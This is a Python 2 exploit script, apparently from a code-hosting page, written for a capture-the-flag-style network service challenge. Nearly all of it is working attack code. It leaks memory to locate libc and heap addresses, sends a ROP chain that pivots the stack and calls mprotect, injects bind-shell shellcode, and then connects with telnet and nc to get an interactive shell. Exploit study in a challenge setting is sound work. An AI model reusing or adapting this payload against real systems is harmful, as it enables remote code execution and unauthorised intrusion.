-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
executable file
·110 lines (81 loc) · 3.19 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#!/usr/bin/env python2
# Exploit for gbr's challenge
# Written by Maycon Maia Vitali ( maycon at hacknroll dot com )
# Hack N' Roll
import socket, struct, sys, os
import telnetlib
PROT_RWX = 0x7
pack = lambda x : struct.pack('I', x)
unpack = lambda x : struct.unpack('<L', x)[0]
if len(sys.argv) != 3:
print "Use: %s <host> <port>" % (sys.argv[0])
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
for stage in xrange(1,5):
print "[>] Sending %d%s stage..." % (stage, ['st', 'nd', 'rd', 'th'][stage - 1])
s0ck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s0ck.connect((host, port))
if stage == 1:
buff = s0ck.send("jigcsaw1:" + "A"*491)
print "[<] Reading leaked data from server..."
recv = s0ck.recv(1024)
leak_word = [unpack(recv[4 * i : 4 * (i+1)]) for i in xrange(len(recv)/4)]
#print "[+] Leaked: 0x%08x 0x%08x 0x%08x 0x%08x" % (
# leak_word[0], leak_word[1], leak_word[2], leak_word[3]
# )
base_libc = (leak_word[0] & 0xfffff000) - 0x1b3000
base_heap = (leak_word[2] & 0xfffff000) - 0x4000
print "[+] Found libc base address @ 0x%08x" % base_libc
print "[+] Found heap base address @ 0x%08x" % base_heap
elif stage == 2:
# Padding
padding = "@" * 44
# Bind shell (port 4444)
bindshell = (
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x5b\x5e\x52\x66\x68\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
"\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd"
"\x80\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\xcd\x80"
)
PIVOTING = 0x2cf30
MPROTECT = 0xe35a0
# ROP gadgets
rop = (
# Pivoting
pack(base_libc + PIVOTING) + # add esp, 0xa4 ; pop ebx ; pop edi ; ret
# Ret2Libc
pack(base_libc + MPROTECT) + # mprotect(*addr, len, prot)
pack(base_heap + 0x5665) + # Return to bindshell
pack(base_heap) + # Heap address
pack(0x25000) + # length
pack(PROT_RWX) # rwx
)
print "[+] Pivoting @ 0x%08x" % (base_libc + PIVOTING)
print "[+] Calling mprotect() @ 0x%08x" % (base_libc + MPROTECT)
payload = (
"jigcsaw1:" +
padding +
rop +
bindshell +
"B" * (450 - len(padding) - len(rop) - len(bindshell))
)
buff = s0ck.send(payload)
recv = s0ck.recv(1024)
elif stage == 3:
pivot_addr = base_heap + 0x564d
print "[+] Pivotting address @ 0x%08x" % (pivot_addr)
s0ck.send("jigcsaw2:" + pack(pivot_addr))
elif stage == 4:
print "[+] Shell?"
pty = """
id
uname -a
python -c "import pty;pty.spawn('/bin/bash')"
"""
s = telnetlib.Telnet(host, 11111)
s.write("%s\n" % pty)
s.interact()
os.system("nc %s 11111" % (host))
sys.stdin.read(1)